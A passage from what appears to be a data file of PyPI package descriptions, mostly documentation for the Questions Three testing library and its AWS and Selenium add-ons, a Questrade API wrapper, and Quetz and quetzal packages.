little more than a simple implementation of thePublish/Subscribe Pattern. Component A subscribes to an event by registering a function with the Event Broker. Component B publishes the event with an optional dictionary of arbitrary properties. The Event Broker calls the subscriber function, passing it the dictionary as keyword arguments.An event can be any object. Internally, Questions Three limits itself to members of an enum called TestEvent. It's defined inquestions_three.constants.An event property can also be any object. Property names are restricted to valid Python variable names so the Event Broker can send them as keyword arguments.HTTP ClientThe HTTP client is a wrapper around the widely-usedrequests module, so it can serve as a drop-in replacement. Its job in life is to integraterequestsinto the event-driven world of Questions Three, doing things like publishing an HTTP transcript when a check fails. It also adds a few features that you can use. Nearly all of the documentation forrequestsapplies to HttpClient as well. There are two deviations, one significant and one somewhat obscure.Deviation 1: HTTP Client raises an exception when it encounters an exceptional status codeWhen the HTTP server returns an exceptionalstatus code(anything in the 400 - 599 range),requestssimply places the status code in the response as it always does and expects you to detect it. HTTP Client, by contrast, detects the status for you and raises anHttpError. There is anHttpErrorsubclass for each exceptional status code defined byRFC 7231(plus one fromRFC 2324just for fun), so you can be very specific with yourexceptblocks. 
For example:from questions_three.exceptions.http_error import HttpImATeapot, HttpNotFound, HttpServerError\nfrom questions_three.http_client import HttpClient\n\ntry:\n HttpClient().get('http://coffee.example.com')\nexcept HttpImATeapot as e:\n # This will catch a 418 only\n # e.response is the requests.Response object returned by `requests.get`\n do_something_clever(response=e.response)\nexcept HttpNotFound:\n # This will catch a 404 only\n do_something_sad()\nexcept HttpServerError:\n # This will catch anything in the 500-599 range.\n do_something_silly()Deviation 2: json is not allowed as a keyword argumentrequestsallows you to write this:requests.post('http://songs.example.com/', json=['spam', 'eggs', 'sausage', 'spam'])HTTP Client does not support this syntax because it interferes with transcript generation. Instead, write this:HttpClient().post('http://songs.example.com/', data=json.dumps(['spam', 'eggs', 'sausage', 'spam'])New feature: simplified cookie managementInstead of creating arequests.Session, you can simply do this:client = HttpClient()\nclient.enable_cookies()The client will now save cookies sent to it by the server and return them to the server with each request.New feature: persistent request headersThis is particularly useful for maintaining an authenticated session:client = HttpClient()\nclient.set_persistent_headers(session_id='some fake id', secret_username='bob')The client will now send the specified headers to the server with each request.New feature: callbacks for exceptional HTTP responsesInstead of putting each request into its own try/except block, you can install\na generic exception handler as acallback:def on_not_found(exception):\n mother_ship.beam_up(exception, exception.response.text)\n\nclient = HttpClient()\nclient.set_exceptional_response_callback(exception_class=HttpNotFound, callback=on_not_found)\nclient.get('https://something-that-does-not-exist.mil/')In the example above, the server will respond to theGETrequest with anHTTP 404(Not Found) response. The client will notice that it has a callback for theHttpNotFoundexception, so will callon_not_foundwith theHttpNotFoundexception as theexceptionkeyword argument.If a callback returnsNone(as in the example above), the client will re-raise the exception after it processes the callback. If the callback returns anything else, the client will return whatever the callback returns. Please observe thePrinciple of Least Astonishmentand have your callback return eitherNoneor else anHttpResponseobject.Installed callbacks will apply to child exception classes as well, so a callback forHttpClientErrorwill be called if the server returns anHttpNotFoundresponse (becauseHttpClientErroris the set of all 4xx responses andHttpNotFoundis 404).You can install as many callbacks as you would like, with one important restriction. You may not install a parent class or a child class of an exception that already has an associated callback. For example, you may install bothHttpNotFoundandHttpUnauthorized, but you may not install bothHttpNotFoundandHttpClientErrorbecauseHttpClientErroris a parent class ofHttpNotFound.Seequestions_three/exceptions/http_error.pyfor complete details of the HttpError\nclass hierarchy. It follows the classification scheme specified in RFC 7231.Tuning with environment variablesHTTP_PROXYThis is a well-established environment variable. Set it to the URL of your proxy for plain HTTP requests.HTTPS_PROXYAs above. 
Set this to the URL of your proxy for secure HTTP requestsHTTPS_VERIFY_CERTSSet this to \"false\" to disable verification of X.509 certificates.HTTP_CLIENT_SOCKET_TIMEOUTStop waiting for an HTTP response after this number of seconds.GraphQL ClientThe GraphQL Client is a wrapper around the HTTP Client that allows for a simple way of making and handling requests against\na GraphQL endpoint. Since the HTTP Client is doing all the heavy lifting, there is only a few custom behaviors that the GraphQL\nClient has.Using the GraphQL Clientclient = HttpClient() # This is where you would authenticate, if needed\ngraphql_client = GraphqlClient(http_client=client, url='https://www.yoursite.com/graph')\n\nyour_important_query = \"\"\"\n query {\n ...\n {\n\"\"\"\ngraphql_client.execute(your_important_query)executeis a neutral method that makesPOSTrequests against your GraphQL endpoint for either Queries or Mutations.\nThe first argument ofexecuteis always the operation that you are trying to perform, and any key-word arguments\nafterwards are turned into your given variables.your_important_query = \"\"\"\n query ($id: String!) {\n ...\n {\n\"\"\"\ngraphql_client.execute(your_important_query, id='1234')Upon making your request (that does not result in an HTTP Error), you will either get aGraphqlResponseobject, or\nif you received errors in your response, anOperationFailedexception will be raised.GraphqlResponseobjects have the following:.http_responseproperty: Therequests.Responseobject returned by the HTTP Client.dataproperty: The JSON representation of your response.data_as_structureproperty: The Structure object representation of your responseOperationFailedexceptions have the following:.http_responseproperty: Therequests.Responseobject returned by the HTTP Client.dataproperty: The JSON representation of your (successful parts of the) response.errorsproperty: The JSON representation of the errors included in your response.operationproperty: The query or mutation sent in your request.operation_variablesproperty: The variables send in your requestWhen raised, the exception message will include the errors strings, or the entire error collectionLogging SubsystemQuestions Three extends Python's logging system to do various things internally that won't matter to most users. However, there's one feature that may be of interest. You can customize how verbose/noisy any given module will be. Most common targets are event_broker when you want to see all the events passing through and http_client when you want excruciating detail about every request and response.export QUESTIONS_THREE_EVENT_BROKER_LOG_LEVEL=INFO\nexport QUESTIONS_THREE_HTTP_CLIENT_LOG_LEVEL=DEBUGThis works with any Questions Three module and any log level defined in theFine Python Manual.You can make it work with your custom components too:from questions_three.logging import logger_for_module\n\nlog = logger_for_module(__name__)\nlog.info('I feel happy!')Vanilla FunctionsYou'll find these inquestions_three.vanilla. The unit tests undertests/vanillaprovide examples of their use.b16encode()Base 16 encode a string. This is basically a hex dump.call_with_exception_tolerance()Execute a function. If it raises a specific exception, wait for a given number of seconds and try again up to a given timeoutformat_exception()Convert an exception to a human-friendly message and stack tracepath_to_entry_script()Return the full path and filename of the script that was called from the command linerandom_base36_string()Return a random string of a given length. 
Useful for generating bogus test data.string_of_sequential_characters()Return a string of letters and numbers in alphabetical order. Useful for generating bogus but deterministic test data.url_append()Replacement forurljointhat does not eliminate characters when slashes are present but does join an arbitrary number of parts.wait_for()Pauses until the given function returns a truthy value and returns the value. Includes a throttle and a timeout.Bulk Suite RunnerTo run all suites in any directory below./my_checks:python -m questions_three.ci.run_all my_checksControlling execution with environment variablesMAX_PARALLEL_SUITESRun up to this number of suites in parallel. Default is 1 (serial execution).REPORTS_PATHPut reports and other artifacts in this directory. Default:./reportsRUN_ALL_TIMEOUTAfter this number of seconds, terminate all running suites and return a non-zero exit code.TEST_RUN_IDAttach this arbitrary string as a property to all events. This allows reporters to discriminate one test run from another.Understanding events and reports(or the philosophy of errors, failures, and warnings)Questions Three follows the convention set by JUnit and draws an important distinction between error events and failure events. This distinction flows from the scaffolds to the Event Broker to the reports.Afailure eventoccurs when a check makes a false assertion. The simplest way to trigger one isassert Falsewhich Python converts to anAssertionErrorwhich the scaffold converts to aTEST_FAILEDevent. The intent of the system is to produce a failure event only when there is high confidence that there is a fault in the system under test.Anerror eventoccurs when some other exception gets raised (or, for whatever batty reason, something other than a check raises anAssertionError). Depending on the context from which the exception was raised, the scaffold will convert it into aSUITE_ERREDor aTEST_ERREDevent. In theory, an error event should indicate a fault in the check. In practice, the fault could be anywhere, especially if the system under test behaves in unanticipated ways.Because of the expectation that failure events indicate faults in the checks and error events indicate faults in the system under test, theEvent Loggerreports failure events as warnings and error events as errors. The warning indicates that the check did its job perfectly and the fault was somewhere else. The error indicates that the fault is in the check. Of course, real life is not so clean.Because the distinction originated from the JUnit world,Junit XML Reporterhas no need to perform any interpretation. It reports failure events as failures and error events as errors."} +{"package": "questions-three-aws", "pacakge-description": "Amazon Web Services Integrations for Questions ThreeThis is an optional package for theQuestions Three testing library.S3 Artifact SaverAs the name implies, the S3 Artifact Saver saves artifacts to an AWS S3 bucket. It subscribes toARTIFACT_CREATEDandREPORT_CREATEDevents and saves everything it sees. 
Among other things, this will include JUnit XML test reports, HTTP transcripts from the built-in HTTP Client, and screenshots and DOM dumps from theoptional Selenium integrations.ActivationCreate (or append) a custom reporters file:echo questions_three_aws.s3_artifact_saver.S3ArtifactSaver >> /var/custom_reportersInform Questions Three about the custom reporters file:export CUSTOM_REPORTERS_FILE=/var/custom_reportersTell the S3 Artifact Saver which bucket to use:export S3_BUCKET_FOR_ARTIFACTS=spam-eggs-sausage-spam(Optional) Specify an object(folder) prefix to which test runs will be saved within the specified bucket:export S3_PREFIX_OBJECT_NAME=some_test_runnerSet appropriate environment variables for AWS:Seethe fine AWS documentation. At a minimum, you will need credentials and a region."} +{"package": "questions-three-selenium", "pacakge-description": "Selenium Integrations for Questions ThreeThis document assumes you are familiar with bothQuestions ThreeandSelenium WebDriverand are interested in putting them together to build beautiful Web UI checks.FeaturesExtended WebDriver class (Browser)Does everything that WebDriver canAutomatically publishes a screen shot and a DOM dump for each test failureProvides extra \"find\" methods with a more pythonic syntaxCan place artifacts in local (HTML 5) storageCan detect navigation to a new pageWaterproof, as used in hospitalsSupport for remote browsersBrowserStackSelenium GridA trivial exampleThis example assumes that you have Chrome andChromedriverinstalled locally. Chrome is the default browser but Firefox is also supported. SeeControlling behavior with environment variables.pip install questions-three-seleniumtrivial_example.pyfrom expects import expect, contain\nfrom questions_three.scaffolds.test_script import test, test_suite\nfrom questions_three_selenium.browser.browser import Browser\n\nwith test_suite('SeleniumExample'):\n\n browser = Browser()\n browser.get('http://www.example.com')\n\n # This test will probably pass\n with test('Verify text contains example domain'):\n html = browser.find_unique_element(tag_name='html')\n expect(html.text.lower()).to(contain('example domain'))\n\n # This test should fail unless the Spinach Inquisition takes over example.com\n with test('Verify text contains Cardinal Biggles'):\n html = browser.find_unique_element(tag_name='html')\n expect(html.text.lower()).to(contain('Cardinal Biggles'))python3 trivial_example.pyThe example includes a failing case so you can inspect thereportsdirectory and see the artifacts that get saved when something fails.Controlling behavior with environment variablesBROWSER_LOCATIONSet this to \"local\" to use a local browserSet it to \"browserstack\" to use a remote browser via BrowserStackSet it to \"selenium_grid\" to use a remote browser via Selenium GridUSE_BROWSERSet this to \"chrome\" to use ChromeSet it to \"firefox\" to use FirefoxUSE_BROWSER_VERSIONRequest this version of the browser. Applies only to remotes.CHROME_USER_AGENTIf using Chrome, pretend to be some other browser by hacking the user agent string to this.BROWSER_AVAILABILITY_TIMEOUTWait up to this number of seconds for a browser to become availableBROWSER_ELEMENT_FIND_TIMEOUTWait up to this number of seconds for a requested element to appear in the DOMSUPPRESS_BROWSER_EXIT_ON_FAILUREOrdinarily, the browser will close automatically when the test suite ends. Set this to \"true\" to leave the browser open after something breaks. 
Useful for debugging.Browser objectsThe trivial example launches a web browser by instantiating aBrowserobject.Browseris mostly a wrapper aroundselenium.webdriver.[browser name].webdriver.WebDriver.It can behave like an ordinary WebDriver objectBrowserobjects can do anything that the underlyingWebDrivercan do, as documented inSelenium with Python.Here is the simple example from the Selenium documentation, modified to useBrowser:from questions_three_selenium import Browser\nfrom selenium.webdriver.common.keys import Keys\n\ndriver = Browser()\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()The example callsdriver.close()but, when you instantiate aBrowserinside a Questions Three suite, it will close automatically after the suite ends.Artifact publishingBrowseris capable of producing a screen shot or a DOM dump (human-readable HTML file that shows all elements in the DOM at some point in time).Manual generationMost of the time, you won't need to do this becauseBrowserautomatically publishes artifacts when a failure occurs, but it's possible:from questions_three_selenium.dom_dumper.dump_dom import dump_dom\n\nbrowser = Browser()\nbrowser.get('http://www.example.com/')\n\nhtml_string = dump_dom(browser)\nscreenshot_png_bytes = browser.get_screenshot_as_png()\n# Use your imagination. Do something creative with your artifacts.Automatic publishingBottom line: you'll see a DOM dump and a screen shot in thereportsdirectory for each test that fails. Read on if you would like to understand how this works.At its core, Questions Three isevent-driven. When something goes wrong, the scaffold publishes the appropriate event (SUITE_ERRED,TEST_ERRED, orTEST_FAILED).Browsersubscribes to all three. When any of these events occurs, it does the following:Take a screen shot of itselfPublish the screen shot as anARTIFACT_CREATEDeventTake a DOM dump of itselfPublish the DOM dump as anARTIFACT_CREATEDeventBy default, Questions Three activates a reporter calledArtifactSaver. It subscribes toARTIFACT_CREATEDevents and saves each artifact to the appropriate place underreports.Extra find methodsaBrowserinstance can be used just like an ordinaryWebDriverinstance. For the sake of convenience and readability, it offers alternative methods for finding elements.pythonic syntaxThe extra methods accept locators as keyword arguments, so instead of thisbrowser.find_elements(By.LINK_TEXT, 'Finland')you can write this:browser.find_all_matching_elements(link_text='Finland')All selectors defined byselenium.webdriver.common.byare supported.find_all_matching_elementsReturns a list of all elements that match the given keyword. 
If no elements match, returns an empty list.divs = browser.find_all_matching_elements(tag_name='div')\nbobs = browser.find_all_matching_elements(id='bob')find_unique_elementExpects the given keyword argument to match exactly one element in the DOM.\nIf the expectation is met, returns the element.\nIf if no element matches, raises NoSuchElement.\nIf more than one element matches, raises TooManyElements.great_sorcerer = browser.find_unique_element(id='tim?')Detecting navigation to a new pagefrom questions_three.vanilla import wait_for\nfrom questions_three_selenium import Browser\n\nbrowser = Browser()\nbrowser.get('http://www.example.com/magic_page')\nare_we_there_yet = browser.func_that_detects_new_page()\nbrowser.find_unique_element(id='magic_button').click()\nwait_for(are_we_there_yet, timeout=20, throttle=1)Writing to HTML 5 local storageSome web applications uselocal storageinstead of cookies for storing things like session tokens.Browserprovides a convenience method for writing to it.session = log_in(username='ximinez', password='N0b0dyExpects')\nbrowser.add_to_local_storage(key='session_token', value=session)BrowserStack supportTyingBrowserto a fresh remote browser fromBrowserStackis a simple matter of setting some environment variables -- unless you also want to use their\"Local\"tunnel. More on that in a bit.For best results, visit BrowserStack'sCapabilitiespage and play with the available configurations. Each of the capabilities maps to an environment variable for Questions Three Selenium:CapabilityEnvironment Variable NameosBROWSERSTACK_OSos_versionBROWSERSTACK_OS_VERSIONbrowserUSE_BROWSERbrowser_versionUSE_BROWSER_VERSIONOther required environment variables:BROWSER_LOCATIONSet this to \"browserstack\"BROWSERSTACK_USERNAMESet this to the username associated with the BrowserStack accountBROWSERSTACK_ACCESS_KEYSet this to the access key provided by BrowserStack for automationOptional environment variables:BROWSERSTACK_SCREEN_RESOLUTIONSet this to one of the strings under \"resolution\" on theCapabilities pageBROWSERSTACK_SET_DEBUGSet this to \"true\" or \"false.\" It defaults to \"false.\"With those environment variables set, instantiate aBrowserobject as normal and it will launch a remote browser via BrowserStack.\"Local\" tunnelThe tunnel requires an executable binary provided by BrowserStack. The BrowserStack integration expects this binary to be in a zip archive at some URL. For best performance, this URL should refer to a nearby location that you control.Required environment variables:BROWSERSTACK_SET_LOCALSet this to \"true\"BROWSERSTACK_LOCAL_BINARY_ZIP_URLThis defaults to the Linux x64 binary at BrowserStack. Point it to wherever you have a zip archive of the binary.BROWSERSTACK_LOCAL_BINARYFull path and filename to where the binary should be stored locally. Default:/tmp/browserstack_tunnel/BrowserStackLocalBROWSERSTACK_URLURL to the BrowserStack hub. Default:http://hub.browserstack.com/wd/hubOptional environment variables:BROWSERSTACK_TUNNEL_TIMEOUTWait up to this number of seconds for the tunnel to open. Default: 30.Selenium Grid supportSelenium Gridsupport is a simple matter of setting environment variables and then instantiating aBrowserobject normally.Required environment variables:BROWSER_LOCATIONSet this to \"selenium_grid\"USE_BROWSERSet this to the name of the expected browser (e.g. \"Firefox\"). 
The exact names will vary with Grid configuration.SELENIUM_GRID_HUB_URLSet this to the URL of your hubOptional environment variables:USE_BROWSER_VERSIONAuthoritative list of environment variablesSeemodule_cfg.yml"} +{"package": "questlib", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "quest-maker-api-shared-library", "pacakge-description": "Quest Maker API Shared LibraryThe Quest Maker API Shared Library provides a set of reusable components and utilities for building applications using the Quest Maker API. This library aims to simplify common tasks, enhance code consistency, and facilitate the development of projects related to quest management."} +{"package": "questo", "pacakge-description": "QuestoQuestois not your ordinary library of CLI elements; It's a framework. It's modular, extensible, Pythonic and brain friendly. You can build your own CLI elements, with custom key-press handling, validation and rendering, all in plain old Python; No magic.Basic Usagefromquestoimportselect,promptfromyakhimportget_keyselector=select.Select()selector.state=select.SelectState(title=\"Who's your favorite Teletubbie\",options=[\"Tinky Winky\",\"Dipsy\",\"Laa-Laa\",\"Po\",\"The Weird Vacuum Thing\"],selected=4)withselector.displayed():whileTrue:selector.state=select.key_handler(selector.state,get_key())ifselector.state.exitorselector.state.abort:breakprompter=prompt.Prompt()prompter.state=prompt.PromptState(title=f\"Why{selector.result}?\",)withprompter.displayed():whileTrue:prompter.state=prompt.key_handler(prompter.state,get_key())ifprompter.state.exitorprompter.state.abort:breakprint(f\"Ah, of course:{prompter.result}\")"} +{"package": "questplus", "pacakge-description": "A QUEST+ implementation in PythonThis is a simple implementation of the QUEST+ algorithm in Python.DocumentationPlease find the documentation atquestplus.readthedocs.io."} +{"package": "quest-py", "pacakge-description": "No description available on PyPI."} +{"package": "questpy-test", "pacakge-description": "Sandia National Laboratories application suite for energy storage analysis and evaluation tools."} +{"package": "questradeapi", "pacakge-description": "Questrade API WrapperThis package is a Python wrapper for the [Questrade API][https://www.questrade.com/api].InstallationTo install QuestradeAPI, you can usepipenv(orpip, of course):pip install questradeapiDocumentationAll the documentation is available athttps://questradeapi.readthedocs.io/en/latest/.Issue ReportingI you find a bug, have a feature request, or have design suggestions, please do not hesitate to report it in the issues section of this repository. 
For any security related issues, please do not report them publicly on the public GitHub issue tracker but contact me direcly by email.AuthorAntoine Viscardi"} +{"package": "questrade-api", "pacakge-description": "questrade_apiPython3 Questrade API WrapperInstallationUsepip/pip3:pip3 install questrade-apiGetting StartedFamiliarise yourself with theSecurity documentationfor the Questrade API.Generatea manual refresh token for your application.Init the API Wrapper with the refresh token:from questrade_api import Questrade\nq = Questrade(refresh_token='XYz1dBlop33lLLuys4Bd')Important:A token will be created at~/.questrade.jsonand used for future API callsIf the token is valid future initiations will not require a refresh tokenfrom questrade_api import Questrade\nq = Questrade()Using the APITimeq.time\n=> {'time': '2018-11-16T09:22:27.090000-05:00'}Accountsq.accounts\n=> {'accounts': [{'type': 'Margin', 'number': '123456', 'status': 'Active' ...}]}Account PositionsAccepts:q.account_positions(123456)\n=> {'positions': [{'symbol': 'RY.TO', 'symbolId': 34658, 'openQuantity': ...}]}Account BalancesAccepts:q.account_balances(123456)\n=> {'perCurrencyBalances': [{'currency': 'CAD', 'cash': 1000, 'marketValue': 0, ...}]}Account ExecutionsAccepts:,startTime=,endTime=q.account_executions(123456)\n=> {'executions': []}q.account_executions(123456,startTime='2018-08-01T00:00:00-0')\n=> {'executions': [{'symbol': 'RY.TO', 'symbolId': 34658, 'quantity': 100, ...}]}Account OrdersAccepts:,startTime=,endTime=,stateFilter=q.account_orders(123456)\n=> {'orders': []}q.account_orders(123456, startTime='2018-08-01T00:00:00-0')\n=> {'orders': [{'id': 444444, 'symbol': 'RY.TO', 'symbolId': 34658, ...}]}Account OrderAccepts:,q.account_order(123456, 444444)\n=> {'orders': [{'id': 444444, 'symbol': 'RY.TO', 'symbolId': 34658, 'totalQuantity': 100, ...}]}Account ActivitiesAccepts:,startTime=,endTime=q.account_activities(123456)\n=> {'activities': []}q.account_activities(123456, startTime='2018-11-01T00:00:00-0')\n=> {'activities': []}SymbolAccepts:q.symbol(34659)\n=> {'symbols': [{'symbol': 'RY.TO 'symbolId': 34658, 'prevDayClosePrice': ...}]}SymbolsAccepts:ids=',',names=','q.symbols(ids='34658,9339')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'prevDayClosePrice': ..}]}q.symbols(names='RY.TO,BNS.TO')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'prevDayClosePrice': ..}]}Symbols SearchAccepts:prefix='',offset=q.symbols_search(prefix='RY.TO')\n=> {'symbols': [{'symbol': 'RY.TO', 'symbolId': 34658, 'description': ...}]}q.symbols_search(prefix='RY', offset=5)\n{'symbols': [{'symbol': 'RY.PRE.TO', 'symbolId': 34700, 'description': ...}]}Symbol OptionsAccepts:q.symbol_options(34658)\n=> {'optionChain': [{'expiryDate': '2018-11-16T00:00:00.000000-05:00', 'description': ... }]}Marketsq.markets\n=> {'markets': [{'name': 'TSX', 'tradingVenues': ['TSX', 'ALPH', 'CXC', ... }]}Markets QuoteAccepts:q.markets_quote(34658)\n=> {'quotes': [{'symbol': 'RY.TO', 'symbolId': 34658, 'tier': ... }]}Markets QuotesAccepts:ids=','q.markets_quotes(ids='34658,9339')\n=> {'quotes': [{'symbol': 'RY.TO', 'symbolId': 34658, 'tier': ... 
}]}Markets OptionsAccepts:optionIds=,filters=q.markets_options(optionIds=[\n 23615873,\n 23615874\n])\n=> {'optionQuotes': [{'underlying': 'RY.TO', 'underlyingId': 34658, 'symbol': 'RY30Nov18 ..}]}q.markets_options(filters=[\n {\n \"optionType\": \"Call\",\n \"underlyingId\": 34658,\n \"expiryDate\": \"2018-11-30T00:00:00.000000-05:00\",\n \"minstrikePrice\": 90,\n \"maxstrikePrice\": 100\n }\n])\n=> {'optionQuotes': [{'underlying': 'RY.TO', 'underlyingId': 34658, 'symbol': 'RY30Nov18 ..}]}Markets StrategiesAccepts:variants=q.markets_strategies(variants=[\n {\n \"variantId\": 1,\n \"strategy\": \"Custom\",\n \"legs\": [\n {\n \"symbolId\": 23545340,\n \"ratio\": 10,\n \"action\": \"Buy\"\n },\n {\n \"symbolId\": 23008592,\n \"ratio\": 10,\n \"action\": \"Sell\"\n }\n ]\n }\n])\n=> {'strategyQuotes': [{'variantId': 1, 'bidPrice': None, 'askPrice': None, 'underlying': 'RY.TO' ...}]}Markets CandlesAccepts:,startTime=,endTime=,interval=q.markets_candles(34658, interval='FiveMinutes')\n=> {'candles': [{'start': '2018-11-16T09:30:00.583000-05:00', 'end': '2018-11-16T ..}]}"} +{"package": "questradeist", "pacakge-description": "No description available on PyPI."} +{"package": "quest-ssim", "pacakge-description": "REASDME.rst"} +{"package": "quetta", "pacakge-description": "# Quetta"} +{"package": "quetz", "pacakge-description": "No description available on PyPI."} +{"package": "quetzal", "pacakge-description": "quetzal v0.4.2.0DBMS that plans to implement a functionality to accept any python data type, one to remotely connect to the database, an API for other languages, and a long etc.My Discord: savra#4491"} +{"package": "quetzal-ai-toolkit", "pacakge-description": "An AI project aiming for cosnsolidating different functionalites under one global package."} +{"package": "quetzal-client", "pacakge-description": "quetzal-clientA Python package that provides a layer on top of quetzal-openapi-client for\neasier usage of theQuetzal API."} +{"package": "quetzalcoatl", "pacakge-description": "No description available on PyPI."} +{"package": "quetzal-crumbs", "pacakge-description": "Quetzal-CRUMBSThis python library is meant to be used along other software from the Quetzal\nframework to perform iDDC modeling and inference.iDDC modeling (Integrated Distributional, Demographic, Coalescent modeling) is a\nmethodology for statistical phylogeography. 
It relies heavily on spatial models\nand methods to explain how past processes (sea level change, glaciers dynamics,\nclimate modifications) shaped the present spatial distribution of genetic lineages.:rocket: The project website liveshere.In short:Access the high resolution paleoclimatic database CHELSA to download world filesFit a Species Distribution model and save (persist) the fitted modelDistribute the fitted model on cluster nodes and reconstruct landscape habitability dynamics across millennia.Assemble the layers and prepare the dynamic landscape for simulation-based inferenceIf using Quetzal-EGGS spatial simulators, retrieve parameters and simulated dataUse Decrypt to perform robustness analysis of species delimitation methods.What problem does this library solve?iDDC modeling is quite a complex workflow and Quetzal-CRUMBS allows to simplify things quite a lot.For example, to estimate the current habitat of a species using CHELSA-Trace21k model and reconstruct its high-resolution dynamics along the last 21.000 years (averaged across 4 different ML classifiers), with nice visualizations and GIS operations at the end, you can just do the following:# Pull the docker image with all the dependenciesdockerpullarnaudbecheler/quetzal-nest:latest# Run the docker image synchronizing you working directorydockerrun--user$(id-u):$(id-g)--rm=true-it\\-v$(pwd):/srv-w/srv\\becheler/quetzal-nest:latest/bin/bashThis will start your docker container. Once inside, copy/paste the following code in ascript.shfile,\nand then run it withchmod u+x script.sh && ./script.sh.#!/bin/bash# your DNA sampling points (shapefile)sample='sampling-points/sampling-points.shp'# for present to LGM analysis (but much longer computations) use instead:# chelsaTimes=$(seq -s ',' -200 1 20)chelsaTimes=20,0,-50# spatial buffer around sampling points (in degree)buffer=2.0# for proper SDM (but much longer computations) use instead:# biovars=dem,biobiovars=dem,bio01\n\ncrumbs-get-gbif\\--species\"Heteronotia binoei\"\\--points$sample\\--limit30\\--year\"1950,2022\"\\--buffer$buffer\\--outputoccurrences\n\nmkdir-poccurrences\nmvoccurrences.*occurrences/\n\ncrumbs-fit-sdm\\--presencesoccurrences/occurrences.shp\\--variables$biovars\\--nb-background100\\--buffer$margin\\--cleanup\\--sdm-file'my-fitted-sdm.bin'#\u00a0This part can be massively parallelized on dHTC gridscrumbs-extrapolate-sdm\\--sdm-file'my-fitted-sdm.bin'\\--timeID20crumbs-extrapolate-sdm\\--sdm-file'my-fitted-sdm.bin'\\--timeID19What is nice is that you can leverage these long computations for publication\nanalyses using dHTC (distributed Hight Throughput Computing)\nand distribute this load on a cluster grid: check outquetzal_on_OSG!Contact and troubleshooting:boom: A problem? A bug?Outrageous!:scream_cat: Please let me know by opening\nan issue or sending me an email so I can fix this! :rescue_worker_helmet::bellhop_bell: In need of assistance about this project? 
Just want to chat?\nLet me know and let's have a zoom meeting!:rocket: Updating the package (tip note for the dev)Create afeaturebranch, make updates to it.Test the featureBump the version insetup.cfgBump the version of thewhlfile in.circleci/config.ymlUpdate the ChangeLogPush to GitHub:rainbow: When you have a successful build onhttps://app.circleci.com/pipelines/github/Becheler/quetzal-CRUMBS:create a Pull Request (PR) to the develop branchMerge the PR if it looks good.When that build succeeds, create a PR to the main branch, review it, and merge.Go get a beer and bless this new version with some luuuv :beer: :revolving_hearts:Workflow fromhttps://circleci.com/blog/publishing-a-python-package/.:books: ReferencesKarger, Dirk Nikolaus; Nobis, M., Normand, Signe; Graham, Catherine H., Zimmermann,\nN.E. (2021). CHELSA-TraCE21k: Downscaled transient temperature and precipitation data\nsince the last glacial maximum. Geoscientific Model Development - DiscussionsVersion 1.0\nKarger, Dirk Nikolaus; Nobis, M., Normand, Signe; Graham, Catherine H., Zimmermann, N.E.\n(2021). CHELSA-TraCE21k: Downscaled transient temperature and precipitation data since\nthe last glacial maximum. EnviDat.Bocedi, G., Pe\u2019er, G., Heikkinen, R. K., Matsinos, Y., & Travis, J. M. (2012). Projecting species\u2019 range expansion dynamics: sources of systematic biases when scaling up patterns and processes. Methods in Ecology and Evolution, 3(6), 1008-1018.Baird, S. J., & Santos, F. (2010). Monte Carlo integration over stepping stone models for spatial genetic inference using approximate Bayesian computation. Molecular ecology resources, 10(5), 873-885.Estoup, A., Baird, S. J., Ray, N., Currat, M., CORNUET, J. M., Santos, F., ... & Excoffier, L. (2010). Combining genetic, historical and geographical data to reconstruct the dynamics of bioinvasions: application to the cane toad Bufo marinus. Molecular ecology resources, 10(5), 886-901."} +{"package": "quetzal-openapi-client", "pacakge-description": "quetzal-openapi-clientThis is an auto-generated package usingopenapi-generatorfrom an OpenAPI specification of the Quetzal API.\nAn improvement layer on this client exists in the quetzal-client package.Quetzal is an API to manage data files and their associated metadata.\nSee more atquetz.aland itsreadthedocs documentation."} +{"package": "quetz-client", "pacakge-description": "quetz-clientA Python client to interact with a Quetz server. 
This client is compatible with allquetzversions listedhere.InstallationFrom conda-forgemambainstallquetz-clientFrom this repoYou can install the package in development mode using:gitclonegit@github.com:mamba-org/quetz-client.gitcdquetz-client# create and activate a fresh environment named quetz-client# see environment.yml for detailsmambaenvcreate\ncondaactivatequetz-client\n\npre-commitinstall\npipinstall--no-build-isolation-e.UsagePython Clientfromquetz_clientimportQuetzClienturl=\"\"# URL to your Quetz servertoken=\"\"# API token for your Quetz serverclient=QuetzClient.from_token(url,token)forchannelinclient.yield_channels():print(channel)CLI ClientexportQUETZ_SERVER_URL=\"\"# URL to your Quetz serverexportQUETZ_API_KEY=\"\"# API token for your Quetz serverquetz-client--help"} +{"package": "quetz-frontend", "pacakge-description": "Quetz-frontendThe Open-Source Server for Conda Packagespart of mamba-orgPackage ManagermambaPackage ServerquetzPackage BuilderboaDevelopmentFirst of all, clone quetz and quetz-frontend, create a conda environment using theenvironment.ymlin quetz, run quetz and modify its config file.# Create an environmentmambaenvcreate-fquetz/environment.yml\nmambaactivatequetz\nmambainstall-cconda-forgenodejs=16yarn=1.22Install Quetz in dev modecdquetz\npipinstall-e.# Run quetzquetzruntest_quetz--delete--copy-conf./dev_config.toml--dev--reloadModify thequetz/test_quetz/config.tomlfile to add the client_id, client_secret, github username and the front-end paths.[github]# Register the app here: https://github.com/settings/applications/newclient_id=\"id\"client_secret=\"secret\"[users]admins=[\"github:username\"]Install Quetz-Frontend in dev mode# build the apppipinstall-e.# Create a link to the quetz folderquetz-frontendlink-frontend--developmentUseful commands# Start an already configured quetz deployment in dev mode:quetzstarttest_quetz--reload# Build the Quetz-frontendyarnrunbuild# Build the Quetz-Frontend in watch modeyarnrunwatchDisabling extensions\"quetz\":{\"extension\":true,\"outputDir\":\"quetz_light_theme/quetzextension\",\"themePath\":\"style/index.css\",\"disabledExtensions\":[\"quetz-theme\"]},Command line toolQuetz fronted also comes with a cli to manage 